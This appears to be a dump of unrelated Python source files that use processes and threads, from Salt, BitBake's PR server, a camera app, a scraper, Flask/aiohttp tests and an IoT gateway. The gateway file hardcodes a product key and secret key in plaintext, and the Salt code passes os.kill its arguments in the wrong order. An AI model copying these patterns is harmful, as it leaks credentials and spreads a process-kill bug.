if exc.errno != errno.ESRCH:
raise
if not p_map['Process'].is_alive():
try:
del self._process_map[pid]
except KeyError:
# Race condition
pass
end_time = time.time() + self.wait_for_kill # when to die
log.trace('Waiting to kill process manager children')
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Joining pid {0}: {1}'.format(pid, p_map['Process']))
p_map['Process'].join(0)
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
# if any managed processes still remain to be handled, let's kill them
kill_iterations = 2
while kill_iterations >= 0:
kill_iterations -= 1
for pid, p_map in six.iteritems(self._process_map.copy()):
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
continue
log.trace('Killing pid {0}: {1}'.format(pid, p_map['Process']))
try:
os.kill(signal.SIGKILL, pid)
except OSError:
# in case the process has since decided to die, os.kill returns OSError
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
if self._process_map:
# Some processes disrespected the KILL signal!!!!
available_retries = kwargs.get('retry', 3)
if available_retries >= 0:
log.info(
'Some processes failed to respect the KILL signal: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for
(k, v) in self._process_map.items()
)
)
log.info('kill_children retries left: %s', available_retries)
kwargs['retry'] = available_retries - 1
return self.kill_children(*args, **kwargs)
else:
log.warning(
'Failed to kill the following processes: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for
(k, v) in self._process_map.items()
)
)
log.warning(
'Salt will either fail to terminate now or leave some '
'zombie processes behind'
)
class MultiprocessingProcess(multiprocessing.Process, NewStyleClassMixIn):
def __new__(cls, *args, **kwargs):
instance = super(MultiprocessingProcess, cls).__new__(cls)
# Patch the run method at runtime because decorating the run method
# with a function with a similar behavior would be ignored once this
# class'es run method is overridden.
instance._original_run = instance.run
instance.run = instance._run
return instance
def __init__(self, *args, **kwargs):
if (salt.utils.is_windows() and
not hasattr(self, '_is_child') and
self.__setstate__.__code__ is
MultiprocessingProcess.__setstate__.__code__):
# On Windows, if a derived class hasn't defined __setstate__, that
# means the 'MultiprocessingProcess' version will be used. For this
# version, save a copy of the args and kwargs to use with its
# __setstate__ and __getstate__.
# We do this so that __init__ will be invoked on Windows in the
# child process so that a register_after_fork() equivalent will
# work on Windows. Note that this will only work if the derived
# class uses the exact same args and kwargs as this class. Hence
# this will also work for 'SignalHandlingMultiprocessingProcess'.
# However, many derived classes take params that they don't pass
# down (eg opts). Those classes need to override __setstate__ and
# __getstate__ themselves.
self._args_for_getstate = copy.copy(args)
self._kwargs_for_getstate = copy.copy(kwargs)
self.log_queue = kwargs.pop('log_queue', None)
if self.log_queue is None:
self.log_queue = salt.log.setup.get_multiprocessing_logging_queue()
else:
# Set the logging queue so that it can be retrieved later with
# salt.log.setup.get_multiprocessing_logging_queue().
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
# Call __init__ from 'multiprocessing.Process' only after removing
# 'log_queue' from kwargs.
super(MultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.is_windows():
# On Windows, the multiprocessing.Process object is reinitialized
# in the child process via the constructor. Due to this, methods
# such as ident() and is_alive() won't work properly. So we use
# our own creation '_is_child' for this purpose.
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_process_logging() directly.
self.__setup_process_logging()
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
else:
multiprocessing.util.register_after_fork(
self,
MultiprocessingProcess.__setup_process_logging
)
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
args = state['args']
kwargs = state['kwargs']
# This will invoke __init__ of the most derived class.
self.__init__(*args, **kwargs)
def __getstate__(self):
args = self._args_for_getstate
kwargs = self._kwargs_for_getstate
if 'log_queue' not in kwargs:
kwargs['log_queue'] = self.log_queue
# Remove the version of these in the parent process since
# they are no longer needed.
del self._args_for_getstate
del self._kwargs_for_getstate
return {'args': args,
'kwargs': kwargs}
def __setup_process_logging(self):
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
def _run(self):
try:
return self._original_run()
except SystemExit:
# These are handled by multiprocessing.Process._bootstrap()
raise
except Exception as exc:
log.error(
'An un-handled exception from the multiprocessing process '
'\'%s\' was caught:\n', self.name, exc_info=True)
# Re-raise the exception. multiprocessing.Process will write it to
# sys.stderr and set the proper exitcode and we have already logged
# it above.
raise
class SignalHandlingMultiprocessingProcess(MultiprocessingProcess):
def __init__(self, *args, **kwargs):
super(SignalHandlingMultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.is_windows():
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_signals() directly.
self.__setup_signals()
else:
multiprocessing.util.register_after_fork(
self,
SignalHandlingMultiprocessingProcess.__setup_signals
)
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
sys.exit(salt.defaults.exitcodes.EX_OK)
def start(self):
with default_signals(signal.SIGINT, signal.SIGTERM):
super(SignalHandlingMultiprocessingProcess, self).start()
@contextlib.contextmanager
def default_signals(*signals):
old_signals = {}
for signum in signals:
old_signals[signum] = signal.getsignal(signum)
signal.signal(signum, signal.SIG_DFL)
# Do whatever is needed with the reset signals
yield
# Restore signals
for signum in old_signals:
signal.signal(signum, old_signals[signum])
del old_signals
|
kernel.py | #!/usr/bin/env python3
#!/usr/bin/python3.8
# OpenCV 4.2, Raspberry pi 3/3b/4b - test on macOS
from camera.camera_async import CameraAsync
from camera.frame import Frame
from camera.record import Record
from camera.streaming import Streaming
from camera.type_cam import TypeCam
from dto.record import RecordDTO
from threading import Thread
class Kernel:
def __init__(self, src=0):
super().__init__()
self.src = src
self.__CAMERA = CameraAsync(src=self.src, name=str(self.src))
self.started = False
def __build__(self):
width, height = self.__CAMERA.get_dimentions()
self.__FRAME = Frame()
self.__RECORD = Record(width, height)
#self.__STREAMING = Streaming()
def initialize(self):
self.__CAMERA.initialize()
self.__CAMERA.start()
self.__build__()
self.start()
def stop(self, src=0) -> None:
self.__CAMERA.stop()
self.started = False
def start(self) -> None:
if self.started == True:
return
self.started = True
#self.thread = Thread(target=self.__update, args=(), daemon=True)
#self.thread.start()
def __update(self) -> None:
while self.started == True:
try:
pass
#grabbed1, frame1, grabbed2, frame2 = self.__CAMERA.read()
#if frame1 is None or frame2 is None:
# continue
#grabbed, frame, is_mov = self.__FRAME.get_frame_normal(frame1, frame2)
#_, jpg = self.__FRAME.get_stream_to_image(frame)
#_r = RecordDTO(self.src, TypeCam.NORMAL, is_mov, frame, jpg)
#self.__RECORD.put_nowait(_r)
#self.__STREAMING.put_nowait(_r)
except Exception as e:
print(e)
|
updateIndex.py | import time
import os
import threading
def generateIndex(cwd, date):
f = open(os.path.join(cwd, "mesAct", "index.html"), 'w')
messageList = ""
for i in range(1, 32):
messageList += """
<li class="list-group-item"><a href="./messages_"""+str(i).center(2, "0")+"""{0}.html" class="stretched-link">messages_"""+str(i).center(2, "0")+"""{0}.html</a></li>"""
f.write(("""<!--{0}-->
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1"/>
<link rel="stylesheet" href="./bootstrap.css">
</head>
<body>
<ul class="list-group">"""+messageList+"""
</ul>
<script>
list = document.getElementsByTagName("li")
var now = new Date().getDate()
for (i = 30; i >= now; i--) list[i].setAttribute("hidden","");
</script>
</body>
</html>""").format(date))
f.close()
class indexUpdater:
def updateIndex(self, cwd, standalone=0):
date = time.strftime("%m%y", time.localtime())
if standalone == 1:
generateIndex(cwd, date)
elif standalone == 0:
while True:
if not os.path.exists(os.path.join(cwd, "mesAct", "index.html")):
generateIndex(cwd, date)
else:
f = open(os.path.join(cwd, "mesAct", "index.html"), 'r')
prevDate = f.read()[4:9]
f.close()
if prevDate != date:
generateIndex(cwd, date)
time.sleep(86400)
def __init__(self, standalone=0):
cwd = os.path.dirname(os.path.abspath(__file__))
threading.Thread(target=self.updateIndex, args=(cwd, standalone,)).start()
if __name__ == "__main__":
indexUpdater(1)
|
simple_fork.py | import multiprocessing
import select
import socket
from time import time
from qactuar import ASGIApp, Config
from qactuar.processes.simple_fork import make_child
from qactuar.servers.base import BaseQactuarServer
class SimpleForkServer(BaseQactuarServer):
def __init__(
self,
host: str = None,
port: int = None,
app: ASGIApp = None,
config: Config = None,
):
super().__init__(host, port, app, config)
self.time_last_cleaned_processes: float = time()
def serve_forever(self) -> None:
self.start_up()
try:
while True:
self.select_socket()
self.check_processes()
except KeyboardInterrupt:
self.shut_down()
except Exception as err:
self.exception_log.exception(err)
self.shut_down()
def select_socket(self) -> None:
ready_to_read, _, _ = select.select(
[self.listen_socket], [], [], self.config.SELECT_SLEEP_TIME
)
if ready_to_read:
accepted_socket = self.accept_client_connection()
if accepted_socket:
self.fork(accepted_socket)
def fork(self, client_socket: socket.socket) -> None:
process = multiprocessing.Process(target=make_child, args=(self, client_socket))
process.daemon = True
try:
process.start()
except AttributeError as err:
self.exception_log.exception(err)
self.server_log.warning(f"Could not start process {process.ident}")
else:
ident = process.ident
if ident:
self.processes[ident] = process
def check_processes(self) -> None:
current_time = time()
last_time = self.time_last_cleaned_processes
if current_time - last_time > 1:
self.time_last_cleaned_processes = current_time
for ident, process in list(self.processes.items()):
if not process.is_alive():
process.close()
del self.processes[ident]
|
remotecontroltransmitter.py | # Copyright (c) 2019, Bosch Engineering Center Cluj and BFMC organizers
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
import json
import socket
import time
from threading import Thread
from multiprocessing import Pipe
from src.utils.remotecontrol.rcbrain import RcBrain
from src.utils.remotecontrol.keyboardlistener import KeyboardListener
from src.utils.templates.workerprocess import WorkerProcess
class RemoteControlTransmitter(Thread):
# ===================================== INIT==========================================
def __init__(self, inPs = [], outPs = []):
"""Remote controller transmitter. This should run on your PC.
"""
super(RemoteControlTransmitter,self).__init__()
# Can be change to a multithread.Queue.
self.lisBrR, self.lisBrS = Pipe(duplex=False)
self.rcBrain = RcBrain()
self.listener = KeyboardListener([self.lisBrS])
self.port = 12244
self.serverIp = '192.168.43.237'
self.threads = list()
# ===================================== RUN ==========================================
def run(self):
"""Apply initializing methods and start the threads.
"""
self._init_threads()
self._init_socket()
for th in self.threads:
th.start()
for th in self.threads:
th.join()
# ===================================== INIT THREADS =================================
def _init_threads(self):
"""Initialize the command sender thread for transmite the receiver process all commands.
"""
self.listener.daemon = self.daemon
self.threads.append(self.listener)
sendTh = Thread(name = 'SendCommand',target = self._send_command_thread, args=(self.lisBrR, ),daemon=self.daemon)
self.threads.append(sendTh)
# ===================================== INIT SOCKET ==================================
def _init_socket(self):
"""Initialize the socket for communication with remote client.
"""
self.client_socket = socket.socket(
family = socket.AF_INET,
type = socket.SOCK_DGRAM
)
# ===================================== SEND COMMAND =================================
def _send_command_thread(self, inP):
"""Transmite the command to the remotecontrol receiver.
Parameters
----------
inP : Pipe
Input pipe.
"""
move=True
#if move:
while True:
key = inP.recv()
command = self.rcBrain.getMessage(key)
command = json.dumps(command).encode()
size = len(command)
self.client_socket.sendto(command,(self.serverIp,self.port))
#command = self.rcBrain.getMessage(key)
# command = self.rcBrain.specMotion(25.0,0.0)
# command = json.dumps(command).encode()
# size = len(command)
# self.client_socket.sendto(command,(self.serverIp,self.port))
# time.sleep(1.5)
# command = self.rcBrain.specMotion(-20.0,0.0)
# command = json.dumps(command).encode()
# size = len(command)
# self.client_socket.sendto(command,(self.serverIp,self.port))
# time.sleep(0.1)
# command = self.rcBrain.specMotion(0.0,0.0)
# command = json.dumps(command).encode()
# size = len(command)
# self.client_socket.sendto(command,(self.serverIp,self.port))
# time.sleep(5)
# command = self.rcBrain.specMotion(-25.0,0.0)
# command = json.dumps(command).encode()
# size = len(command)
# self.client_socket.sendto(command,(self.serverIp,self.port))
# time.sleep(1.4)
# command = self.rcBrain.specMotion(20.0,0.0)
# command = json.dumps(command).encode()
# size = len(command)
# self.client_socket.sendto(command,(self.serverIp,self.port))
# time.sleep(0.1)
# command = self.rcBrain.specMotion(0.0,0.0)
# command = json.dumps(command).encode()
# size = len(command)
# self.client_socket.sendto(command,(self.serverIp,self.port))
# time.sleep(5)
|
serv.py | import os,sys,logging
import signal, time
from SimpleXMLRPCServer import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
import threading
import Queue
import socket
import StringIO
try:
import sqlite3
except ImportError:
from pysqlite2 import dbapi2 as sqlite3
import bb.server.xmlrpc
import prserv
import prserv.db
import errno
logger = logging.getLogger("BitBake.PRserv")
if sys.hexversion < 0x020600F0:
print("Sorry, python 2.6 or later is required.")
sys.exit(1)
class Handler(SimpleXMLRPCRequestHandler):
def _dispatch(self,method,params):
try:
value=self.server.funcs[method](*params)
except:
import traceback
traceback.print_exc()
raise
return value
PIDPREFIX = "/tmp/PRServer_%s_%s.pid"
singleton = None
class PRServer(SimpleXMLRPCServer):
def __init__(self, dbfile, logfile, interface, daemon=True):
''' constructor '''
try:
SimpleXMLRPCServer.__init__(self, interface,
logRequests=False, allow_none=True)
except socket.error:
ip=socket.gethostbyname(interface[0])
port=interface[1]
msg="PR Server unable to bind to %s:%s\n" % (ip, port)
sys.stderr.write(msg)
raise PRServiceConfigError
self.dbfile=dbfile
self.daemon=daemon
self.logfile=logfile
self.working_thread=None
self.host, self.port = self.socket.getsockname()
self.pidfile=PIDPREFIX % (self.host, self.port)
self.register_function(self.getPR, "getPR")
self.register_function(self.quit, "quit")
self.register_function(self.ping, "ping")
self.register_function(self.export, "export")
self.register_function(self.dump_db, "dump_db")
self.register_function(self.importone, "importone")
self.register_introspection_functions()
self.requestqueue = Queue.Queue()
self.handlerthread = threading.Thread(target = self.process_request_thread)
self.handlerthread.daemon = False
def process_request_thread(self):
"""Same as in BaseServer but as a thread.
In addition, exception handling is done here.
"""
iter_count = 1
# 60 iterations between syncs or sync if dirty every ~30 seconds
iterations_between_sync = 60
bb.utils.set_process_name("PRServ Handler")
while not self.quit:
try:
(request, client_address) = self.requestqueue.get(True, 30)
except Queue.Empty:
self.table.sync_if_dirty()
continue
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
iter_count = (iter_count + 1) % iterations_between_sync
if iter_count == 0:
self.table.sync_if_dirty()
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
self.table.sync()
self.table.sync_if_dirty()
def sigint_handler(self, signum, stack):
if self.table:
self.table.sync()
def sigterm_handler(self, signum, stack):
if self.table:
self.table.sync()
self.quit=True
def process_request(self, request, client_address):
self.requestqueue.put((request, client_address))
def export(self, version=None, pkgarch=None, checksum=None, colinfo=True):
try:
return self.table.export(version, pkgarch, checksum, colinfo)
except sqlite3.Error as exc:
logger.error(str(exc))
return None
def dump_db(self):
"""
Returns a script (string) that reconstructs the state of the
entire database at the time this function is called. The script
language is defined by the backing database engine, which is a
function of server configuration.
Returns None if the database engine does not support dumping to
script or if some other error is encountered in processing.
"""
buff = StringIO.StringIO()
try:
self.table.sync()
self.table.dump_db(buff)
return buff.getvalue()
except Exception as exc:
logger.error(str(exc))
return None
finally:
buff.close()
def importone(self, version, pkgarch, checksum, value):
return self.table.importone(version, pkgarch, checksum, value)
def ping(self):
return not self.quit
def getinfo(self):
return (self.host, self.port)
def getPR(self, version, pkgarch, checksum):
try:
return self.table.getValue(version, pkgarch, checksum)
except prserv.NotFoundError:
logger.error("can not find value for (%s, %s)",version, checksum)
return None
except sqlite3.Error as exc:
logger.error(str(exc))
return None
def quit(self):
self.quit=True
return
def work_forever(self,):
self.quit = False
self.timeout = 0.5
bb.utils.set_process_name("PRServ")
# DB connection must be created after all forks
self.db = prserv.db.PRData(self.dbfile)
self.table = self.db["PRMAIN"]
logger.info("Started PRServer with DBfile: %s, IP: %s, PORT: %s, PID: %s" %
(self.dbfile, self.host, self.port, str(os.getpid())))
self.handlerthread.start()
while not self.quit:
self.handle_request()
self.handlerthread.join()
self.db.disconnect()
logger.info("PRServer: stopping...")
self.server_close()
return
def start(self):
if self.daemon:
pid = self.daemonize()
else:
pid = self.fork()
# Ensure both the parent sees this and the child from the work_forever log entry above
logger.info("Started PRServer with DBfile: %s, IP: %s, PORT: %s, PID: %s" %
(self.dbfile, self.host, self.port, str(pid)))
def delpid(self):
os.remove(self.pidfile)
def daemonize(self):
"""
See Advanced Programming in the UNIX, Sec 13.3
"""
try:
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
#parent return instead of exit to give control
return pid
except OSError as e:
raise Exception("%s [%d]" % (e.strerror, e.errno))
os.setsid()
"""
fork again to make sure the daemon is not session leader,
which prevents it from acquiring controlling terminal
"""
try:
pid = os.fork()
if pid > 0: #parent
os._exit(0)
except OSError as e:
raise Exception("%s [%d]" % (e.strerror, e.errno))
self.cleanup_handles()
os._exit(0)
def fork(self):
try:
pid = os.fork()
if pid > 0:
return pid
except OSError as e:
raise Exception("%s [%d]" % (e.strerror, e.errno))
bb.utils.signal_on_parent_exit("SIGTERM")
self.cleanup_handles()
os._exit(0)
def cleanup_handles(self):
signal.signal(signal.SIGINT, self.sigint_handler)
signal.signal(signal.SIGTERM, self.sigterm_handler)
os.chdir("/")
sys.stdout.flush()
sys.stderr.flush()
si = file('/dev/null', 'r')
so = file(self.logfile, 'a+')
se = so
os.dup2(si.fileno(),sys.stdin.fileno())
os.dup2(so.fileno(),sys.stdout.fileno())
os.dup2(se.fileno(),sys.stderr.fileno())
# Clear out all log handlers prior to the fork() to avoid calling
# event handlers not part of the PRserver
for logger_iter in logging.Logger.manager.loggerDict.keys():
logging.getLogger(logger_iter).handlers = []
# Ensure logging makes it to the logfile
streamhandler = logging.StreamHandler()
streamhandler.setLevel(logging.DEBUG)
formatter = bb.msg.BBLogFormatter("%(levelname)s: %(message)s")
streamhandler.setFormatter(formatter)
logger.addHandler(streamhandler)
# write pidfile
pid = str(os.getpid())
pf = file(self.pidfile, 'w')
pf.write("%s\n" % pid)
pf.close()
self.work_forever()
self.delpid()
class PRServSingleton(object):
def __init__(self, dbfile, logfile, interface):
self.dbfile = dbfile
self.logfile = logfile
self.interface = interface
self.host = None
self.port = None
def start(self):
self.prserv = PRServer(self.dbfile, self.logfile, self.interface, daemon=False)
self.prserv.start()
self.host, self.port = self.prserv.getinfo()
def getinfo(self):
return (self.host, self.port)
class PRServerConnection(object):
def __init__(self, host, port):
if is_local_special(host, port):
host, port = singleton.getinfo()
self.host = host
self.port = port
self.connection, self.transport = bb.server.xmlrpc._create_server(self.host, self.port)
def terminate(self):
try:
logger.info("Terminating PRServer...")
self.connection.quit()
except Exception as exc:
sys.stderr.write("%s\n" % str(exc))
def getPR(self, version, pkgarch, checksum):
return self.connection.getPR(version, pkgarch, checksum)
def ping(self):
return self.connection.ping()
def export(self,version=None, pkgarch=None, checksum=None, colinfo=True):
return self.connection.export(version, pkgarch, checksum, colinfo)
def dump_db(self):
return self.connection.dump_db()
def importone(self, version, pkgarch, checksum, value):
return self.connection.importone(version, pkgarch, checksum, value)
def getinfo(self):
return self.host, self.port
def start_daemon(dbfile, host, port, logfile):
ip = socket.gethostbyname(host)
pidfile = PIDPREFIX % (ip, port)
try:
pf = file(pidfile,'r')
pid = int(pf.readline().strip())
pf.close()
except IOError:
pid = None
if pid:
sys.stderr.write("pidfile %s already exist. Daemon already running?\n"
% pidfile)
return 1
server = PRServer(os.path.abspath(dbfile), os.path.abspath(logfile), (ip,port))
server.start()
# Sometimes, the port (i.e. localhost:0) indicated by the user does not match with
# the one the server actually is listening, so at least warn the user about it
_,rport = server.getinfo()
if port != rport:
sys.stdout.write("Server is listening at port %s instead of %s\n"
% (rport,port))
return 0
def stop_daemon(host, port):
import glob
ip = socket.gethostbyname(host)
pidfile = PIDPREFIX % (ip, port)
try:
pf = file(pidfile,'r')
pid = int(pf.readline().strip())
pf.close()
except IOError:
pid = None
if not pid:
# when server starts at port=0 (i.e. localhost:0), server actually takes another port,
# so at least advise the user which ports the corresponding server is listening
ports = []
portstr = ""
for pf in glob.glob(PIDPREFIX % (ip,'*')):
bn = os.path.basename(pf)
root, _ = os.path.splitext(bn)
ports.append(root.split('_')[-1])
if len(ports):
portstr = "Wrong port? Other ports listening at %s: %s" % (host, ' '.join(ports))
sys.stderr.write("pidfile %s does not exist. Daemon not running? %s\n"
% (pidfile,portstr))
return 1
try:
PRServerConnection(ip, port).terminate()
except:
logger.critical("Stop PRService %s:%d failed" % (host,port))
try:
if pid:
wait_timeout = 0
print("Waiting for pr-server to exit.")
while is_running(pid) and wait_timeout < 50:
time.sleep(0.1)
wait_timeout += 1
if is_running(pid):
print("Sending SIGTERM to pr-server.")
os.kill(pid,signal.SIGTERM)
time.sleep(0.1)
if os.path.exists(pidfile):
os.remove(pidfile)
except OSError as e:
err = str(e)
if err.find("No such process") <= 0:
raise e
return 0
def is_running(pid):
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
return False
return True
def is_local_special(host, port):
if host.strip().upper() == 'localhost'.upper() and (not port):
return True
else:
return False
class PRServiceConfigError(Exception):
pass
def auto_start(d):
global singleton
host_params = filter(None, (d.getVar('PRSERV_HOST', True) or '').split(':'))
if not host_params:
return None
if len(host_params) != 2:
logger.critical('\n'.join(['PRSERV_HOST: incorrect format',
'Usage: PRSERV_HOST = "<hostname>:<port>"']))
raise PRServiceConfigError
if is_local_special(host_params[0], int(host_params[1])) and not singleton:
import bb.utils
cachedir = (d.getVar("PERSISTENT_DIR", True) or d.getVar("CACHE", True))
if not cachedir:
logger.critical("Please set the 'PERSISTENT_DIR' or 'CACHE' variable")
raise PRServiceConfigError
bb.utils.mkdirhier(cachedir)
dbfile = os.path.join(cachedir, "prserv.sqlite3")
logfile = os.path.join(cachedir, "prserv.log")
singleton = PRServSingleton(os.path.abspath(dbfile), os.path.abspath(logfile), ("localhost",0))
singleton.start()
if singleton:
host, port = singleton.getinfo()
else:
host = host_params[0]
port = int(host_params[1])
try:
connection = PRServerConnection(host,port)
connection.ping()
realhost, realport = connection.getinfo()
return str(realhost) + ":" + str(realport)
except Exception:
logger.critical("PRservice %s:%d not available" % (host, port))
raise PRServiceConfigError
def auto_shutdown(d=None):
global singleton
if singleton:
host, port = singleton.getinfo()
try:
PRServerConnection(host, port).terminate()
except:
logger.critical("Stop PRService %s:%d failed" % (host,port))
singleton = None
def ping(host, port):
conn=PRServerConnection(host, port)
return conn.ping()
|
scrape.py | import requests as r
from json import loads, dumps
from os import mkdir, chdir, listdir, getcwd
import threading
from sys import argv
class Parse:
def __init__(self, data : str):
self.data = loads(data)
def refine(self) -> str:
data = []
for item in self.data['data']:
del item['id']
data.append(item)
return dumps(data, indent = 1)
def info(year : int, subject : str):
url = 'https://questions.aloc.ng/api/m?subject={}&year={}'.format(subject, year)
data = r.get(url)
data = Parse(data.content.decode('utf-8')).refine()
f = open(subject + '/' + str(year) + '.json', 'w')
f.write(data)
f.close()
if __name__ == '__main__':
subject = []
year = int(input('year to scrape from\n'))
if argv != []:
del argv[0]
subject = list(argv)
else:
pass
for item in subject:
if item not in listdir(getcwd()):
mkdir(item)
else:
pass
for index, y in enumerate(range(2001, year)):
print('thread ', index, ' started')
x = threading.Thread(target = info, args=(y, item), daemon = False, group = None)
x.start()
#x.join()
print('thread ', index, ' ended')
|
test_aiowebsocket.py | import time
import pytest
import asyncio
import threading
import contextlib
import urllib.parse
import urllib.request
import aiohttp
from flask import Flask, request
from websocket import WebSocket
from werkzeug.debug import DebuggedApplication
from .. import AioHTTP, wrap_wsgi_middleware, async, websocket
class Server(contextlib.ContextDecorator):
def __init__(self, app: Flask, aio: AioHTTP, *,
host='127.0.0.1', port=0):
super().__init__()
self.app = app
self.aio = aio
self.host = host
self.port = port
self.loop = asyncio.get_event_loop()
self._server = None
self.condition = threading.Condition(threading.Lock())
def start(self):
# Wrap WSGI app with werkzeug debugger.
self.app.wsgi_app = wrap_wsgi_middleware(DebuggedApplication)(
self.app.wsgi_app)
thread = threading.Thread(target=self.run)
thread.start()
def stop(self):
self.loop.call_soon_threadsafe(self.loop.stop)
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
time.sleep(0.001) # For bypassing unknown exception at stopping loop.
self.stop()
@property
def server(self):
with self.condition:
if self._server is None:
self.condition.wait()
return self._server
@server.setter
def server(self, server):
with self.condition:
self._server = server
if server is not None:
self.condition.notify_all()
def run(self):
asyncio.set_event_loop(self.loop)
# Create coroutine
coroutine = self.loop.create_server(
self.app.aiohttp_app.make_handler(), self.host, self.port)
# Get server
server = self.loop.run_until_complete(coroutine)
self.server = server
# Run until `stop()`
self.loop.run_forever()
@property
def address(self):
#: :type: socket.socket
sock = self.server.sockets[0]
return '{}:{}'.format(*sock.getsockname())
@property
def base_url(self):
return 'http://' + self.address
@property
def ws_base_url(self):
return 'ws://' + self.address
def ws_url(self, path, **params):
url = self.ws_base_url + path
if params:
url += '?' + urllib.parse.urlencode(params)
return url
def url(self, path, **params):
url = self.base_url + path
if params:
url += '?' + urllib.parse.urlencode(params)
return url
def request(self, method, path, params=None):
r = urllib.request.Request(self.url(path, **params),
method=method.upper())
with urllib.request.urlopen(r) as response:
return response.readall().decode('utf-8')
def get(self, path, **kwargs):
return self.request('GET', path, params=kwargs)
@pytest.fixture
def app():
app = Flask(__name__)
return app
@pytest.fixture
def aio(app: Flask):
return AioHTTP(app)
def test_flask(app: Flask, aio: AioHTTP):
"""Test for checking flask working find"""
@app.route('/foo')
def foo():
return 'foo'
@app.route('/bar')
def bar():
def stream():
yield 'bar'
return app.response_class(stream())
with Server(app, aio) as server:
assert 'foo' == server.get('/foo')
assert 'bar' == server.get('/bar')
def test_async(app: Flask, aio: AioHTTP):
"""Test for asynchronous I/O in Flask view"""
@app.route('/foo')
def foo():
return 'foo'
@app.route('/lazy-foo')
@async
def lazy_foo():
response = yield from aiohttp.request('GET', request.host_url + 'foo')
data = yield from response.read()
return data
@app.route('/streaming-foo')
@async
def streaming_foo():
response = yield from aiohttp.request('GET', request.host_url + 'foo')
data = yield from response.read()
def stream():
yield data
return app.response_class(stream())
with Server(app, aio) as server:
assert 'foo' == server.get('/foo')
assert 'foo' == server.get('/lazy-foo')
assert 'foo' == server.get('/streaming-foo')
def test_websocket(app: Flask, aio: AioHTTP):
"""Test for websocket"""
@app.route('/echo')
@websocket
def echo():
while True:
msg = yield from aio.ws.receive_msg()
if msg.tp == aiohttp.MsgType.text:
aio.ws.send_str(msg.data)
elif msg.tp == aiohttp.MsgType.close:
break
elif msg.tp == aiohttp.MsgType.error:
break
with Server(app, aio) as server:
ws = WebSocket()
ws.connect(server.ws_url('/echo'))
try:
ws.send('foo')
assert 'foo' == ws.recv()
finally:
ws.close()
def test_request_hook(app: Flask, aio: AioHTTP):
"""Test for Flask request hook"""
@app.before_request
def before_request():
request.foo = []
request.foo.append('a')
@app.after_request
def after_request(response):
request.foo.append('c')
return response
@app.teardown_request
def teardown_request(exc):
request.foo.append('d')
@app.route('/hook')
@async
def hook():
request.foo.append('b')
return ''.join(request.foo)
with Server(app, aio) as server:
assert 'ab' == server.get('/hook')
|
iot_gateway.py | import time, random
import requests, json
import uuid, hashlib, hmac
import paho.mqtt.client as mqtt
from threading import Thread
from datetime import datetime
DEVICE_NO = '02-0000b5'
PRODUCT_KEY = 'A4MU33FGXY4URY6Z'
CLOUD_PASSWORD =''
SECRET_KEY = 'a234d8152d2f6ef163baa68acbfb5db0'
GATEWAY_URL = 'http://192.168.85.138:8080'
